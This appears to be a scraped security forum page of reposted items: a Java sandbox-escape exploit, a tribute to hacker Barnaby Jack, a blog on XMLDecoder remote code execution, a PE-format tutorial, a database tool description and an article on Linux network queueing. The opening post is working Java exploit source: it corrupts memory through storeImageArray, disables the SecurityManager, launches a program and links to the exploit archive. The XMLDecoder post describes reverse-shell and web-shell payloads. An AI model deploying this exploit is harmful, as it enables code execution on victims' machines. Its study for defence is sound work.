java.awt.EventQueue.invokeAndWait(new Runnable() { public void run() { initComponents(); // print environment info logAdd( "JRE: " + System.getProperty("java.vendor") 
+ " " + System.getProperty("java.version") + "\nJVM: " + System.getProperty("java.vm.vendor") + " " + System.getProperty("java.vm.version") + "\nJava Plug-in: " + System.getProperty("javaplugin.version") + "\nOS: " + System.getProperty("os.name") + " " + System.getProperty("os.arch") + " (" + System.getProperty("os.version") + ")" ); } }); } catch (Exception ex) { ex.printStackTrace(); } } public void logAdd(String str) { txtArea.setText(txtArea.getText() + str + "\n"); } public void logAdd(Object o, String... str) { logAdd((str.length > 0 ? str[0]:"") + (o == null ? "null" : o.toString())); } public String errToStr(Throwable t) { String str = "Error: " + t.toString(); StackTraceElement[] ste = t.getStackTrace(); for(int i=0; i < ste.length; i++) { str += "\n\t" + ste[i].toString(); } t = t.getCause(); if (t != null) str += "\nCaused by: " + errToStr(t); return str; } public void logError(Exception ex) { logAdd(errToStr(ex)); } public static String toHex(int i) { return Integer.toHexString(i); } /** * This method is called from within the init() method to initialize the * form. WARNING: Do NOT modify this code. The content of this method is * always regenerated by the Form Editor. 
*/ @SuppressWarnings("unchecked") // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents private void initComponents() { btnStart = new javax.swing.JButton(); jScrollPane2 = new javax.swing.JScrollPane(); txtArea = new javax.swing.JTextArea(); btnStart.setText("Run calculator"); btnStart.addMouseListener(new java.awt.event.MouseAdapter() { public void mousePressed(java.awt.event.MouseEvent evt) { btnStartMousePressed(evt); } }); txtArea.setEditable(false); txtArea.setColumns(20); txtArea.setFont(new java.awt.Font("Arial", 0, 12)); // NOI18N txtArea.setRows(5); txtArea.setTabSize(4); jScrollPane2.setViewportView(txtArea); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane()); getContentPane().setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() .addContainerGap() .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 580, Short.MAX_VALUE) .addContainerGap()) .addGroup(layout.createSequentialGroup() .addGap(242, 242, 242) .addComponent(btnStart, javax.swing.GroupLayout.PREFERRED_SIZE, 124, javax.swing.GroupLayout.PREFERRED_SIZE) .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap() .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 344, Short.MAX_VALUE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) .addComponent(btnStart) .addContainerGap()) ); }// </editor-fold>//GEN-END:initComponents private boolean _isMac = System.getProperty("os.name","").contains("Mac"); private boolean _is64 = System.getProperty("os.arch","").contains("64"); // we will need ColorSpace which returns 1 from getNumComponents() class MyColorSpace extends ICC_ColorSpace 
{ public MyColorSpace() { super(ICC_Profile.getInstance(ColorSpace.CS_sRGB)); } // override getNumComponents public int getNumComponents() { int res = 1; //logAdd("MyColorSpace.getNumComponents() = " + res); return res; } } // we will need ComponentColorModel with the obedient isCompatibleRaster() which always returns true. class MyColorModel extends ComponentColorModel { public MyColorModel() { super(new MyColorSpace(), new int[]{8,8,8}, false, false, 1, DataBuffer.TYPE_BYTE); } // override isCompatibleRaster public boolean isCompatibleRaster(Raster r) { boolean res = true; logAdd("MyColorModel.isCompatibleRaster() = " + res); return res; } } private int tryExpl() { try { // alloc aux vars String name = "setSecurityManager"; Object[] o1 = new Object[1]; Object o2 = new Statement(System.class, name, o1); // make a dummy call for init // allocate byte buffer for destination Raster. DataBufferByte dst = new DataBufferByte(16); // allocate the target array right after dst int[] a = new int[8]; // allocate an object array right after a[] Object[] oo = new Object[7]; // create Statement with the restricted AccessControlContext oo[2] = new Statement(System.class, name, o1); // create powerful AccessControlContext Permissions ps = new Permissions(); ps.add(new AllPermission()); oo[3] = new AccessControlContext( new ProtectionDomain[]{ new ProtectionDomain( new CodeSource( new java.net.URL("file:///"), new java.security.cert.Certificate[0] ), ps ) } ); // store System.class pointer in oo[] oo[4] = ((Statement)oo[2]).getTarget(); // save old a.length int oldLen = a.length; logAdd("a.length = 0x" + toHex(oldLen)); // create regular source image BufferedImage bi1 = new BufferedImage(4,1, BufferedImage.TYPE_INT_ARGB); logAdd(bi1); // prepare the sample model with "dataBitOffset" pointing outside dst[] onto a.length MultiPixelPackedSampleModel sm = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4,1,1,4, 44 + (_is64 ? 
8:0)); // create malformed destination image based on dst[] data WritableRaster wr = Raster.createWritableRaster(sm, dst, null); BufferedImage bi2 = new BufferedImage(new MyColorModel(), wr, false, null); logAdd(bi2); // prepare first pixel which will overwrite a.length bi1.getRaster().setPixel(0,0, new int[]{-1,-1,-1,-1}); // call the vulnerable storeImageArray() function (see ...\jdk\src\share\native\sun\awt\medialib\awt_ImagingLib.c) AffineTransformOp op = new AffineTransformOp(new java.awt.geom.AffineTransform(1,0,0,1,0,0), null); op.filter(bi1, bi2); // check results: a.length should be overwritten by 0xFFFFFFFF int len = a.length; logAdd("a.length = 0x" + toHex(len)); if (len == oldLen) { // check a[] content corruption // for RnD for(int i=0; i < len; i++) if (a[i] != 0) logAdd("a["+i+"] = 0x" + toHex(a[i])); // exit logAdd("error 1"); return 1; } // ok, now we can read/write outside the real a[] storage, // lets find our Statement object and replace its private "acc" field value // search for oo[] after a[oldLen] boolean found = false; int ooLen = oo.length; for(int i=oldLen+2; i < oldLen+32; i++) if (a[i-1]==ooLen && a[i]==0 && a[i+1]==0 // oo[0]==null && oo[1]==null && a[i+2]!=0 && a[i+3]!=0 && a[i+4]!=0 // oo[2,3,4] != null && a[i+5]==0 && a[i+6]==0) // oo[5,6] == null { // read pointer from oo[4] int stmTrg = a[i+4]; // search for the Statement.target field behind oo[] for(int j=i+7; j < i+7+64; j++){ if (a[j] == stmTrg) { // overwrite default Statement.acc by oo[3] ("AllPermission") a[j-1] = a[i+3]; found = true; break; } } if (found) break; } // check results if (!found) { // print the memory dump on error // for RnD String s = "a["+oldLen+"...] 
= "; for(int i=oldLen; i < oldLen+32; i++) s += toHex(a[i]) + ","; logAdd(s); } else try { // show current SecurityManager logAdd(System.getSecurityManager(), "Security Manager = "); // call System.setSecurityManager(null) ((Statement)oo[2]).execute(); // show results: SecurityManager should be null logAdd(System.getSecurityManager(), "Security Manager = "); } catch (Exception ex) { logError(ex); } logAdd(System.getSecurityManager() == null ? "Ok.":"Fail."); } catch (Exception ex) { logError(ex); } return 0; } private void btnStartMousePressed(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btnStartMousePressed try { logAdd("===== Start ====="); // try several attempts to exploit for(int i=1; i <= 5 && System.getSecurityManager() != null; i++){ logAdd("Attempt #" + i); tryExpl(); } // check results if (System.getSecurityManager() == null) { // execute payload Runtime.getRuntime().exec(_isMac ? "/Applications/Calculator.app/Contents/MacOS/Calculator":"calc.exe"); } logAdd("===== End ====="); } catch (Exception ex) { logError(ex); } }//GEN-LAST:event_btnStartMousePressed // Variables declaration - do not modify//GEN-BEGIN:variables private javax.swing.JButton btnStart; private javax.swing.JScrollPane jScrollPane2; private javax.swing.JTextArea txtArea; // End of variables declaration//GEN-END:variables } Download: http://packetstormsecurity.com/files/download/122777/PSA-2013-0811-1-exploit.tgz Sursa: Oracle Java storeImageArray() Invalid Array Indexing Code Execution ? Packet Storm
  14. Right, and how many terrorists and criminals have those clowns actually caught this way?
  15. ATM manufacturer pays respects to hacker who broke into its systems

Both Barnaby Jack and Triton showed how white-hat hacking should be done.

A tribute to the late Barnaby Jack by the company whose systems he hacked shows how hackers can really help make the world a safer place.

When New Zealand hacker Barnaby Jack suddenly died last month, the Internet was awash with tributes to the man probably best known for the "jackpotting" attack on ATMs he demonstrated at the Black Hat conference in 2010. The tributes demonstrated that Jack, who was due to speak at Black Hat this year on hacking pacemakers, was both loved and respected in the security community. His sister wrote the touching words "I was always so proud. Seems I'm not the only one."

Yesterday, I spotted another tribute, by Henry Schwarz of Triton. Triton produces ATMs - the very machines whose security Jack demonstrated to be lacking. Many in Triton's position would have ignored or denied the problem, and perhaps even attempted to prevent Jack from speaking about the hack (as happened recently to researchers who had broken security codes in expensive cars). Instead, Triton did the only right thing: the company reached out to Jack and worked with him on improving the security of its systems.

Jack, too, could have made the wrong decision: it doesn't require much imagination to understand how his ATM-hacking skills could easily have made him a lot of money. But he informed the ATM vendors about the attack, worked with them to solve the issues, and delayed a presentation about it until after a patch had been rolled out. He even decided not to disclose the how-to of the attack.

It isn't always easy to explain to the general public how white-hat hackers, when they go on stage and demonstrate what to most people looks like a clear criminal act, really help make the world a safer place. Perhaps we should tell them the story of Barnaby Jack and Triton.
Schwarz finishes his tribute by writing "Barnaby and I started as adversaries and ended as friends. Our heartfelt condolences to his family and loved ones." We, of course, share that sentiment. Sursa: Virus Bulletin : Blog - ATM manufacturer pays respects to hacker who broke into its systems
  16. [h=3]Using XMLDecoder to execute server-side Java code on a Restlet application (i.e. Remote Command Execution)[/h] At the DefCon REST presentation we did last week (see slides here), after the Neo4j CSRF payload to start processes (calc and nc) on the server demo, we also showed how dangerous Java's XMLDecoder can be. (tldr: scroll to the end of the article to see how to create an XML file that will trigger a reverse shell from a REST server into an attacker's box)

I have to say that I was quite surprised that it was possible to execute Java code (and start processes) from XML files! Abraham and Alvaro deserve all the credit for connecting the dots between XMLDecoder and REST.

Basically what happens is that Java's JDK has a feature called Long Term Persistence which can be used like this: As you can see from the example shown above, the XML provided to the XMLDecoder API is able to create an instance of javax.swing.JButton and invoke its methods. I can see why this is useful and why it was added to the JDK (since it allows for much better 'Long Term Object Persistence'), BUT, in practice, what this means is that Java payloads can be inserted in XML files/messages. This is already dangerous in most situations (i.e. when was the last time you actually thought that an XML file was able to trigger code execution on a server), BUT when you add REST to the mix, we basically have a 'Remote Code/Command Execution' vulnerability.

Awareness for this issue

Although there is some awareness out there of the dangers of XMLDecoder, I don't think there is enough understanding of what is possible to do with the XML provided to the XMLDecoder. For example "Is it safe to use XMLDecoder to read document files?" asks: ... with the answer being spot on: Unfortunately, one really has to look for those 'alerts', since the main XMLDecoder info/documentation doesn't mention them. For example, the main links you get by searching for XMLDecoder: ... encourage its use: ...and provide no info on the 'remote code execution' feature of XMLDecoder.

Connecting the dots: using XMLDecoder on a REST API

There are two key scenarios where this 'feature' becomes a spectacular vulnerability:

- Server-side backend systems that process attacker-controlled XML files using XMLDecoder
- REST APIs that use XMLDecoder to create strongly typed objects from the HTTP request data

And the 2nd case is exactly what happens with the Restlet REST API, which wraps XMLDecoder in its org.restlet.representation.ObjectRepresentation<T> feature/class. Note how the documentation page: ... makes no reference to the dangerous use of XMLDecoder (ironically, it doesn't even mention XMLDecoder, just that it can parse data created by XMLEncoder).

How XMLDecoder is used in Restlet

In Restlet the ObjectRepresentation<T> class can be used on REST methods to create objects from the HTTP request body (which is an XML string). For example, on the PoC that we created for the DefCon presentation (based on one of the Restlet source code example apps) ... I changed the code at line 68 (which manually retrieved data from the HTTP request data) ... into the code you can see below at line 72 ... which uses ObjectRepresentation<T> to map the HTTP request data into an object of type Item.

Note that this is exactly the capability provided by MVC frameworks that automagically bind HTTP post data into model objects. This 'feature' is the one that creates the Model Binding vulnerabilities which I have been talking about here, here, here, here, here, here, here and here. In fact, XMLDecoder is a Model Binding vulnerability (also called Over Posting, Mass Assignment or Auto Binding vulns) on steroids, since not only can we put data on that object, we can create completely new ones and invoke methods on them.
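To make the mechanism concrete, here is a minimal, self-contained sketch of my own (not the DefCon PoC) showing that the XML document alone decides which class XMLDecoder instantiates and which methods it invokes. The demo payload is harmless, but as the comment notes, the same parser will just as happily build a ProcessBuilder.

```java
import java.beans.XMLDecoder;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;

public class XmlDecoderDemo {
    // Decode an XMLEncoder-style document: the attacker-supplied XML chooses
    // the class to instantiate and the methods to call on it.
    static Object decode(String xml) {
        try (XMLDecoder decoder =
                 new XMLDecoder(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)))) {
            return decoder.readObject();
        }
    }

    public static void main(String[] args) {
        // Harmless payload: builds a java.util.ArrayList and calls add() on it.
        // Swap the class for java.lang.ProcessBuilder and the method for start()
        // and the same decoding step launches a process instead.
        String xml =
            "<java version=\"1.7.0\" class=\"java.beans.XMLDecoder\">"
          + "<object class=\"java.util.ArrayList\">"
          + "<void method=\"add\"><string>injected-element</string></void>"
          + "</object>"
          + "</java>";
        System.out.println(decode(xml)); // prints [injected-element]
    }
}
```

Nothing in the calling code mentions ArrayList; the type and the method call both come from the data, which is exactly why feeding attacker-controlled XML into XMLDecoder is so dangerous.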
Before you read the exploits, remember that the change I made to the code (see below) … is one that any developer could make if tasked with automatically casting the received REST XML data into objects.

In order to develop the exploits and create PoCs, I quickly wrote an O2 Platform based tool, which you can get from here: This tool: … provided a GUI where these XML exploits: …could easily be sent to a running instance of the test Restlet app.

Multiple examples of what can be done using the XMLDecoder meta-language

1 - create item (Simple).xml - normal object creation
2 - create item (using properties).xml - object creation and calling setters
3 - create item (from var).xml - creating and using a variable
4 - create item (and more).xml - creating/invoking a completely different class
5 - create item (and calc).xml - starting calc.exe using Java's Runtime.getRuntime(). Note that this example is VERY STEALTHY since there will be no casting error thrown by the XMLDecoder conversion (the first object created in the XML execution is the one returned, which in this case is the expected one (firstResource.Item))
6 - Process Builder - Start a Calc.xml - create a completely different object (ProcessBuilder), which will throw a casting error ... after the process execution starts
7a - Creating a File.xml - in the target app we were using there was no webroot available with the ability to render JSPs (it was a pure REST server with only REST routes). But if there was one, and we could write to it, we could use the technique shown below to upload a JSP shell (like this one), and exploit the server from there.
7b - Creating a Class File.xml - since we can upload files, we can compile a class file locally and 'upload' it to the server
7d - execution class file - anotherExecute- calcl.xml - in this case the class file we uploaded had a method that could be used to start processes
8a - HttpResponse - return variable.xml - this is a cool technique where I found the Restlet equivalent of HttpServletResponse, so I was able to write content directly to the current browser
8b - HttpResponse - return variables.xml - which can be used to return data assigned to XMLDecoder-created variables
8c - HttpResponse - return JavaProperties.xml - in this case the java.lang.getProperties values (but if this was a real app, we could use this to extract data from the database or from in-memory objects)
8d - Exploit - Create XSS.xml - another option is to trigger XSS on the current user (useful if the first payload was delivered over CSRF to the victim)
8e - HttpResponse - execute process - read two lines.xml - here is a way to execute a process and get its output shown in the browser
9a - download NetCat.xml - here is how to trigger an HTTP connection from the server to the attacker's box and download the NetCat tool
9b - Start NetCat reverse shell.xml - once NetCat is available on the server, we can use it to send a reverse shell to an external IP:Port

This is when I ran out of time for writing more PoCs... but as you can see by the end, I was just about writing Java code; the only thing I didn't figure out was how to create loops and anonymous methods/classes (need to look at the Command Pattern). I also hope that by now you see how dangerous the XMLDecoder capabilities are, and how its use must be VERY VERY carefully analysed and protected.

How can XMLDecoder be used safely?

I'm not entirely sure at the moment. The Secure Coding Guidelines for the Java Programming Language, Version 4.0 have a note on 'Long Term Persistence of JavaBeans': But the "Long Term Persistence of JavaBeans Components: XML Schema" article (which btw is the best resource out there on how to use the XMLDecoder) has no mention of security.

Hopefully the presentation that we did at DefCon and blog posts like this will raise awareness of this issue and good solutions will emerge.

Note that I'm not as good in Java as I am in .NET, so I'm sure there is something in Java or the JDK that I'm missing. Let me know what you think of this issue, if there are safe ways to use XMLDecoder, and if you spot other dangerous uses of XMLDecoder.

UPDATE: Presentation slides

See this page for the presentation slides (hosted by SlideShare)

Dinis Cruz at 13:33

Sursa: Dinis Cruz Blog: Using XMLDecoder to execute server-side Java Code on an Restlet application (i.e. Remote Command Execution)
  17. @Byte-ul I was supposed to defend my bachelor's thesis this summer, but I didn't pass all my exams, so I still have to wait. I can't say what it's about; I can only say that it is related to PE files. When it's done, probably this winter, if I don't change my topic, I'll post it here with all the necessary information. @bobi_m6 Thanks for the advice, I'll keep it in mind when I write the final version of the theory for my thesis. It didn't quite look like this at first, it wasn't so "personal", but I basically turned it into a tutorial so that everyone can understand it better. @Matt This is the final version. It is not a complete article on what the "PE structure" means, but I hope to write a second part in the future with the necessary additions.
  18. [RST] Tutorial - Formatul fisierelor PE (The PE File Format) This tutorial is basically part of the "theory" for my bachelor's thesis. The article is not complete, it is aimed at beginners, and I hope everyone will understand what it is about. Have you ever wondered what an executable file (.exe) or a library of functions (.dll) contains? Here you will find some basic notions. Contents: - General format - The MS-DOS header - The MS-DOS program - The PE headers - The section table If you have questions, don't hesitate to post them. Download: https://rstforums.com/proiecte/Formatul_Fisierelor_PE.pdf http://www.exploit-db.com/wp-content/themes/exploit/docs/27516.pdf http://packetstormsecurity.com/files/download/122779/Formatul_Fisierelor_PE.pdf Thanks
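As a small taste of the topics listed in the contents (the MS-DOS header and the PE headers), here is a hedged sketch of my own, not from the PDF: it reads the two MS-DOS header fields every PE parser needs, the "MZ" magic at offset 0 and e_lfanew at offset 0x3C, which points to the "PE\0\0" signature.

```java
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.nio.file.Files;
import java.nio.file.Paths;

public class PePeek {
    static final int E_LFANEW_OFFSET = 0x3C;    // last field of the MS-DOS header
    static final int PE_SIGNATURE = 0x00004550; // "PE\0\0" read little-endian

    // True if the image starts with the MS-DOS magic "MZ".
    static boolean hasDosMagic(byte[] image) {
        return image.length >= 2 && image[0] == 'M' && image[1] == 'Z';
    }

    // e_lfanew: the file offset at which the PE headers begin.
    static int peHeaderOffset(byte[] image) {
        return ByteBuffer.wrap(image).order(ByteOrder.LITTLE_ENDIAN).getInt(E_LFANEW_OFFSET);
    }

    public static void main(String[] args) throws Exception {
        byte[] image = Files.readAllBytes(Paths.get(args[0])); // e.g. any .exe or .dll
        int peOffset = peHeaderOffset(image);
        System.out.printf("DOS magic ok: %b, PE headers at 0x%x%n", hasDosMagic(image), peOffset);
        int sig = ByteBuffer.wrap(image).order(ByteOrder.LITTLE_ENDIAN).getInt(peOffset);
        System.out.printf("PE signature ok: %b%n", sig == PE_SIGNATURE);
    }
}
```

From e_lfanew onwards come the COFF file header, the optional header and the section table, which is exactly the ground the tutorial covers.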
  19. He was probably pressured by the "merry boys" (the intelligence services)... Little by little, we are losing control over what used to be "our world".
  20. DBeaver - Universal Database Manager

Overview

DBeaver is a free and open source (GPL) universal database tool for developers and database administrators.

- Usability is the main goal of this project; the program UI is carefully designed and implemented.
- It is freeware.
- It is multiplatform.
- It is based on an open-source framework and allows writing of various extensions (plugins).
- It supports any database having a JDBC driver.
- It may handle any external data source which may or may not have a JDBC driver.
- There is a set of plugins for certain databases (MySQL and Oracle in version 1.x) and different database management utilities (e.g. ERD).

Supported (tested) databases: MySQL, Oracle, PostgreSQL, IBM DB2, Microsoft SQL Server, Sybase, ODBC, Java DB (Derby), Firebird (Interbase), HSQLDB, SQLite, Mimer, H2, IBM Informix, SAP MAX DB, Cache, Ingres, Linter, Teradata, Vertica, and any JDBC-compliant data source.

Supported OSes: Windows (2000/XP/2003/Vista/7), Linux, Mac OS, Solaris, AIX, HPUX.

General features:
- Database metadata browsing
- Metadata editor (tables, columns, keys, indexes)
- SQL statement/script execution
- SQL highlighting (specific for each database engine)
- Autocompletion and metadata hyperlinks in the SQL editor
- Result set/table editing
- BLOB/CLOB support (view and edit modes)
- Scrollable result sets
- Data (tables, query results) export
- Transaction management
- Database object (tables, columns, constraints, procedures) search
- ER diagrams
- Database object bookmarks
- SQL script management
- Projects (connections, SQL scripts and bookmarks)

MySQL plugin features: Enum/Set datatypes, procedure/trigger view, metadata DDL view, session management, user management, catalog management, advanced metadata editor.

Oracle plugin features: XML and Cursor datatype support; packages, procedures, triggers, indexes, tablespaces and other metadata objects browse/edit; metadata DDL view; session management; user management; advanced metadata editor.

Other benefits:
- DBeaver consumes much less memory than other popular similar software (SQuirreL, DBVisualizer)
- Database metadata is loaded on demand and there is no long-running "metadata caching" procedure at connect time
- The ResultSet viewer (grid) is very fast and consumes very little memory
- All remote database operations work in non-blocking mode, so DBeaver does not hang if the database server does not respond or if there is a related network issue

License

DBeaver is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. DBeaver is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. License full version

Contacts

Technical support – support@jkiss.org
Technical support, feature suggestions and any other questions – serge@jkiss.org

Download: http://dbeaver.jkiss.org/download/

Sursa: DBeaver - Universal Database Manager
  21. Queueing in the Linux Network Stack

[A slightly shorter and edited version of this article appeared in the July 2013 issue of Linux Journal. Thanks to Linux Journal's great copyright policy I'm still allowed to post this on my site. Go here to subscribe to Linux Journal.]

Packet queues are a core component of any network stack or device. They allow asynchronous modules to communicate, increase performance and have the side effect of impacting latency. This article aims to explain where IP packets are queued in the Linux network stack, how interesting new latency-reducing features such as BQL operate and how to control buffering for reduced latency. The figure below will be referenced throughout, and modified versions will be presented to illustrate specific concepts.

Figure 1 – Simplified high-level overview of the queues on the transmit path of the Linux network stack

Driver Queue (aka ring buffer)

Between the IP stack and the network interface controller (NIC) lies the driver queue. This queue is typically implemented as a first-in, first-out (FIFO) ring buffer – just think of it as a fixed-size buffer. The driver queue does not contain packet data. Instead it consists of descriptors which point to other data structures called socket kernel buffers (SKBs), which hold the packet data and are used throughout the kernel.

Figure 2 – Partially full driver queue with descriptors pointing to SKBs

The input source for the driver queue is the IP stack, which queues complete IP packets. The packets may be generated locally or received on one NIC to be routed out another when the device is functioning as an IP router. Packets added to the driver queue by the IP stack are dequeued by the hardware driver and sent across a data bus to the NIC hardware for transmission.

The reason the driver queue exists is to ensure that whenever the system has data to transmit, the data is available to the NIC for immediate transmission. 
That is, the driver queue gives the IP stack a location to queue data asynchronously from the operation of the hardware. One alternative design would be for the NIC to ask the IP stack for data whenever the physical medium is ready to transmit. Since responding to this request cannot be instantaneous, this design wastes valuable transmission opportunities, resulting in lower throughput. The opposite approach would be for the IP stack to wait after a packet is created until the hardware is ready to transmit. This is also not ideal because the IP stack cannot move on to other work.

Huge Packets from the Stack

Most NICs have a fixed maximum transmission unit (MTU), which is the biggest frame that can be transmitted by the physical medium. For Ethernet the default MTU is 1,500 bytes, but some Ethernet networks support jumbo frames of up to 9,000 bytes. Inside the IP network stack, the MTU can manifest as a limit on the size of the packets which are sent to the device for transmission. For example, if an application writes 2,000 bytes to a TCP socket then the IP stack needs to create two IP packets to keep each packet's size less than or equal to the 1,500-byte MTU. For large data transfers the comparatively small MTU causes a large number of small packets to be created and transferred through the driver queue.

In order to avoid the overhead associated with a large number of packets on the transmit path, the Linux kernel implements several optimizations: TCP segmentation offload (TSO), UDP fragmentation offload (UFO) and generic segmentation offload (GSO). All of these optimizations allow the IP stack to create packets which are larger than the MTU of the outgoing NIC. For IPv4, packets as large as the IPv4 maximum of 65,536 bytes can be created and queued to the driver queue. In the case of TSO and UFO, the NIC hardware takes responsibility for breaking the single large packet into packets small enough to be transmitted on the physical interface. 
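The segmentation arithmetic above is just ceiling division. A small illustrative sketch of my own (it deliberately ignores per-packet header overhead, which real TSO/GSO segmentation does account for):

```java
public class SegmentCount {
    // Wire packets needed to carry 'payloadBytes' when each packet may carry
    // at most 'mtuBytes' (ceiling division; header overhead ignored for simplicity).
    static int segments(int payloadBytes, int mtuBytes) {
        return (payloadBytes + mtuBytes - 1) / mtuBytes;
    }

    public static void main(String[] args) {
        // The 2,000-byte socket write from the text against a 1,500-byte MTU:
        System.out.println(segments(2000, 1500));   // 2
        // One maximum-size 65,536-byte super-packet split for the wire:
        System.out.println(segments(65536, 1500));  // 44
    }
}
```

So a single maximum-size packet handed to the driver queue can stand in for dozens of wire-size packets, which is exactly why these offloads inflate the number of bytes the queue can hold.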
For NICs without hardware support, GSO performs the same operation in software immediately before queueing to the driver queue.

Recall from earlier that the driver queue contains a fixed number of descriptors which each point to packets of varying sizes. Since TSO, UFO and GSO allow for much larger packets, these optimizations have the side effect of greatly increasing the number of bytes which can be queued in the driver queue. Figure 3 illustrates this concept in contrast with figure 2.

Figure 3 – Large packets can be sent to the NIC when TSO, UFO or GSO are enabled. This can greatly increase the number of bytes in the driver queue.

While the rest of this article focuses on the transmit path, it is worth noting that Linux also has receive side optimizations which operate similarly to TSO, UFO and GSO. These optimizations also have the goal of reducing per-packet overhead. Specifically, generic receive offload (GRO) allows the NIC driver to combine received packets into a single large packet which is then passed to the IP stack. When forwarding packets, GRO allows for the original packets to be reconstructed which is necessary to maintain the end-to-end nature of IP packets. However, there is one side effect: when the large packet is broken up on the transmit side of the forwarding operation, it results in several packets for the flow being queued at once. This 'micro-burst' of packets can negatively impact inter-flow latencies.

Starvation and Latency

Despite its necessity and benefits, the queue between the IP stack and the hardware introduces two problems: starvation and latency. If the NIC driver wakes to pull packets off of the queue for transmission and the queue is empty, the hardware will miss a transmission opportunity thereby reducing the throughput of the system. This is referred to as starvation. Note that an empty queue when the system does not have anything to transmit is not starvation – this is normal.
The complication associated with avoiding starvation is that the IP stack which is filling the queue and the hardware driver draining the queue run asynchronously. Worse, the duration between fill or drain events varies with the load on the system and external conditions such as the network interface's physical medium. For example, on a busy system the IP stack will get fewer opportunities to add packets to the buffer which increases the chances that the hardware will drain the buffer before more packets are queued. For this reason it is advantageous to have a very large buffer to reduce the probability of starvation and ensure high throughput.

While a large queue is necessary for a busy system to maintain high throughput, it has the downside of allowing for the introduction of a large amount of latency.

Figure 4 – Interactive packet (yellow) behind bulk flow packets (blue)

Figure 4 shows a driver queue which is almost full with TCP segments for a single high bandwidth, bulk traffic flow (blue). Queued last is a packet from a VoIP or gaming flow (yellow). Interactive applications like VoIP or gaming typically emit small packets at fixed intervals which are latency sensitive, while a high bandwidth data transfer generates a higher packet rate and larger packets. This higher packet rate can fill the buffer between interactive packets causing the transmission of the interactive packet to be delayed.

To further illustrate this behaviour consider a scenario based on the following assumptions:

A network interface which is capable of transmitting at 5 Mbit/sec or 5,000,000 bits/sec.
Each packet from the bulk flow is 1,500 bytes or 12,000 bits.
Each packet from the interactive flow is 500 bytes.
The depth of the queue is 128 descriptors.
There are 127 bulk data packets and 1 interactive packet queued last.
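These assumptions can be plugged into a quick shell calculation (a minimal sketch; the numbers are just the scenario above):

```shell
# Time to drain 127 bulk packets of 12,000 bits each at 5 Mbit/sec
bulk_packets=127
bits_per_packet=12000
link_bps=5000000

queued_bits=$((bulk_packets * bits_per_packet))
latency_ms=$((queued_bits * 1000 / link_bps))
echo "${latency_ms} ms"          # prints "304 ms"
```

Halving the queue depth halves this worst-case delay, which is why queue sizing matters so much at low link rates.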
Given the above assumptions, the time required to drain the 127 bulk packets and create a transmission opportunity for the interactive packet is (127 * 12,000) / 5,000,000 = 0.304 seconds (304 milliseconds for those who think of latency in terms of ping results). This amount of latency is well beyond what is acceptable for interactive applications and this does not even represent the complete round trip time – it is only the time required to transmit the packets queued before the interactive one. As described earlier, the size of the packets in the driver queue can be larger than 1,500 bytes if TSO, UFO or GSO are enabled. This makes the latency problem correspondingly worse.

Large latencies introduced by oversized, unmanaged buffers are known as Bufferbloat. For a more detailed explanation of this phenomenon see Controlling Queue Delay and the Bufferbloat project.

As the above discussion illustrates, choosing the correct size for the driver queue is a Goldilocks problem – it can't be too small or throughput suffers, it can't be too big or latency suffers.

Byte Queue Limits (BQL)

Byte Queue Limits (BQL) is a new feature in recent Linux kernels (> 3.3.0) which attempts to solve the problem of driver queue sizing automatically. This is accomplished by adding a layer which enables and disables queuing to the driver queue based on calculating the minimum buffer size required to avoid starvation under the current system conditions. Recall from earlier that the smaller the amount of queued data, the lower the maximum latency experienced by queued packets.

It is key to understand that the actual size of the driver queue is not changed by BQL. Rather, BQL calculates a limit of how much data (in bytes) can be queued at the current time. Any bytes over this limit must be held or dropped by the layers above the driver queue.

The BQL mechanism operates when two events occur: when packets are enqueued to the driver queue and when a transmission to the wire has completed.
A simplified version of the BQL algorithm is outlined below. LIMIT refers to the value calculated by BQL.

****
** After adding packets to the queue
****

if the number of queued bytes is over the current LIMIT value then
    disable the queueing of more data to the driver queue

Notice that the amount of queued data can exceed LIMIT because data is queued before the LIMIT check occurs. Since a large number of bytes can be queued in a single operation when TSO, UFO or GSO are enabled, these throughput optimizations have the side effect of allowing a higher than desirable amount of data to be queued. If you care about latency you probably want to disable these features. See later parts of this article for how to accomplish this.

The second stage of BQL is executed after the hardware has completed a transmission (simplified pseudo-code):

****
** When the hardware has completed sending a batch of packets
** (Referred to as the end of an interval)
****

if the hardware was starved in the interval
    increase LIMIT

else if the hardware was busy during the entire interval (not starved) and there are bytes to transmit
    decrease LIMIT by the number of bytes not transmitted in the interval

if the number of queued bytes is less than LIMIT
    enable the queueing of more data to the buffer

As you can see, BQL is based on testing whether the device was starved. If it was starved, then LIMIT is increased allowing more data to be queued which reduces the chance of starvation. If the device was busy for the entire interval and there are still bytes to be transferred in the queue then the queue is bigger than is necessary for the system under the current conditions and LIMIT is decreased to constrain the latency.

A real-world example may help provide a sense of how much BQL affects the amount of data which can be queued. On one of my servers the driver queue size defaults to 256 descriptors.
Since the Ethernet MTU is 1,500 bytes this means up to 256 * 1,500 = 384,000 bytes can be queued to the driver queue (TSO, GSO etc are disabled or this would be much higher). However, the limit value calculated by BQL is 3,012 bytes. As you can see, BQL greatly constrains the amount of data which can be queued.

An interesting aspect of BQL can be inferred from the first word in the name – byte. Unlike the size of the driver queue and most other packet queues, BQL operates on bytes. This is because the number of bytes has a more direct relationship with the time required to transmit to the physical medium than the number of packets or descriptors, since the latter are variably sized.

